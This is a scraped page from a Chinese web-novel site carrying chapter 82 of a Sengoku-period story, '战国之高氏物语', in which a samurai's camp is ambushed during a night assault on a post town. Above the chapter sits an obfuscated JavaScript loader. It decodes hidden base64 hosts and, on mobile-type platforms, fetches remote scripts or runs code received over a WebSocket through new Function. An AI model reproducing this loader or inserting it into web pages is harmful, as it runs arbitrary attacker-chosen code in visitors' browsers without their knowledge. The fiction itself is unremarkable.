笔趣阁

字:
关灯 护眼
笔趣阁 > 战国之高氏物语 > 第八十二章悔恨不停忠良言
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第八十二章悔恨不停忠良言

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
贺茂众的诸多縂领非是部伍出身,不过三河郡乡里的土豪而已,少知兵法,不仅自身颇为放纵,不懂得为将之术,便是下面郎党的军纪更是不严。
  
  菅沼定村率众杂町内聚饮,兵营内的这二百来名足轻亦是在营内喧闹到半夜方才歇息,且因横行八名南郡多时,根本无人敢来与他们为难,本该彻夜值宿的巡兵,到一更天时,也都自回长屋内安歇去了。
  
  营内负责留守的武士,正是那日在堂上反对菅沼定村派人暗杀高师盛的穗井田定国。
  
  他比营内其余人等要强上许多,因担忧所有総领全都入町宴饮,两边配下的部众会因流言而引发营啸,故而主动请命留在兵营内坐镇,以安众心。
  
  当乱起之时,他正尚未解甲,仍在长屋内秉烛夜读,惊闻营中喧闹声起,隐约还闻得法螺号的声响,这明显是招聚兵马的讯信。
  
  但也未曾往别处想,只当是町宿内菅沼定存诸人喝得起性,有人在吹奏法螺号助兴,但喧哗声逐渐由远到近,一直蔓延到了兵营内。
  
  穗井田定国自知贺茂众内的军纪不好,但夜半还敢这般吵闹,初时还以为是两边的部众,因为些许小事儿争吵,着实让他大为恼怒,当即叫醒长屋内已经睡下的几名郎党,命令道:“你们四人拿上叉棍,去看一看是怎么回事!如果还有人敢吵闹,便与我责打。”
  
  这四名郎党方睡下不久,突然被叫醒这会儿正昏昏沉沉的,胡乱应了一声便披衣出门,赶着跑去喧哗声处。
  
  穗井田定国苦口婆心地对长屋内一并睡醒的郎党、亲信们说道:“方今吾等既投了织田上总介,便与以前大不相同了。过往我等只是在郡乡内横行的寻常国人众,自然可以随性而为,从兹以后,你我便是上总介暗藏在三河国内的军势,骏府派来的那名恶代官,在信州时如何残虐国人、寺社你等又不是没有听闻过,稍有不慎,我贺茂众与尾张内通之事一旦被其知晓,引得骏府大军再来弹压,到时候恐怕党众内上千之众,尽数都要死无於类了!”
  
  “我正是担忧会有变故,才自请留在营内值守,你等却埋怨不得入町宿内宴饮,志摩守赐下酒肉、菜肴,你等又在营内喝得酩酊大醉,这会儿都到得了深更半夜,居然还有人未睡下,借着酒劲撒疯,也便是七郎、八郎两个去了尾张国为质,无人能够约束的住你们,难道我便行不得军法了么?”
  
  七郎、八郎分别是菅沼定村的三弟、四弟,分别担任贺茂众内的大横目与介错人,主管行使军法。
  
  穗井田定国的郎党、亲信们多数都不以为然,有的还暗自腹诽自家総领半夜多事,但没有人不识趣地顶撞他,都连声应诺。
  
  见到长屋内的众人全都敷衍虚应,穗井田又说道:“你等不要以为我太苛刻,去年国代朝比奈兵库配下的那两千远江国旗本队,里面随便一组足轻都要比咱们这些部伍强之万倍!也只有这样的,才称得上是精兵啊,志摩守若能将贺茂众演练的有远江国旗本队一半的模样,这别说这区区郡南十乡之地,便是郡北诸乡,甚至是渥美郡和宝饭郡,也未必不能全部夺占下来。”
  
  穗井田定国在去年险些丧命在骏府旗本队的手中,所以对其的训练有素,精良能战是非常羡慕。
  
  他正教训郎党、亲信间,适才奉他命令去镇压喧闹的那四名郎党中的一人,连滚带爬地奔了回来,一边跑,一边惊惶地叫道:“総领!総领!大事不好,大事不好啊。”
  
  穗井田定国看他这般模样,心中不由咯噔一声,面上却还是保持镇定,连忙起身过去扶住那人问道:“出了什么事了?跟你一同去的另外三人呢?你又怎会是这幅样子!到底出了何事?致使如此惊乱。”
  
  这个郎党惊魂不定,今天本就有些偏冷,再加上入夜后又起了凉风,但他还是出了一头的汗,也不知是跑太快跑出来的,还是惊吓出来的,顾不上擦汗,他只把迷住眼的那点汗擦了一擦,颤声说道:“有军势正在围攻嵩山宿,现在已经起了大火!”
  
  “……,甚么?”穗井田定国慌忙令人出门,站在长屋外的阶梯上观望,果然见得嵩山宿内火光冲天,连忙让人将兵营内倒头大睡的诸位武士唤起,带了过来。
  
  “那远处的喧哗声不是起咱们兵营内的,而是来自嵩山宿内响起的。小人顺着喧哗跑到辕门口,往嵩山宿那边一看,町宿内现在已经乱成了一团,不知道有多少军势正在围攻。”
  
  “……,哪里来的?”
  
  “那些军势本阵处,立有一个面幡旗,上面写着‘南无诹访大明神’。”
  
  “这是何人?”穗井田定国问及左右诸人。
  
  东三河国内,未曾听闻有哪家豪族用诹访神旗为马印,附近郎党亦是无人知晓。
  
  一个聪明些的猜测答道:“既是诹访神旗,那会不是是诹访氏的人?”但话说完后,便觉得自家简直是在胡言乱语,诹访郡离得三河间隔两郡,何止百里。
  
  有性急的叫道:“难怪奥平贞庆设宴款待,说不得便是他兵营内的军势从西门杀进町宿,闹了半天他才是叛逆,総领等当即刻驰志摩守!我愿为先手役,带人杀进嵩山宿内,为志摩守解困!”说话这人是铃木众内的一名武士。
  
  又有一人叫道,“奥平贞庆不可信,铃木重澄恐怕也有问题,也不可不防,万一他们都是同伙合谋,说不得连咱们也要被困。”
  
  穗井田定国强自镇定,说道:“铃木众至今未曾反乱,对你我下手显然亦是不知情的,切勿内乱。”
  
  安抚过后,他看向请战的那人说道:“我知你素来勇猛,是铃木四郎配下的一员悍将,你即刻领人先行出营,查探动静,我待召集完兵营内的其余人手后,马上便赶奔过去。。”
  
  这人应诺退下,拉上屋内的两三人出门。
  
  穗井田定国将营内诸人全都叫醒过后,已经过去三刻钟的功夫,而后慌忙出营,他还没有来得及发令出阵,原本埋伏在营门外许久的伏兵,确是等得早就不耐烦了,一见到正主终于是出来了,直接闪身杀出。
  
  “列队迎敌······。”井穗田定国顿时骇然,话没说完,已经快步逼近在辕门两侧的弓箭手,立刻挽弓密集攒射,猝不及防之下,距离门外的十几名贺茂众足轻,顿时被这三十几支乱箭,当场射杀倒地。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师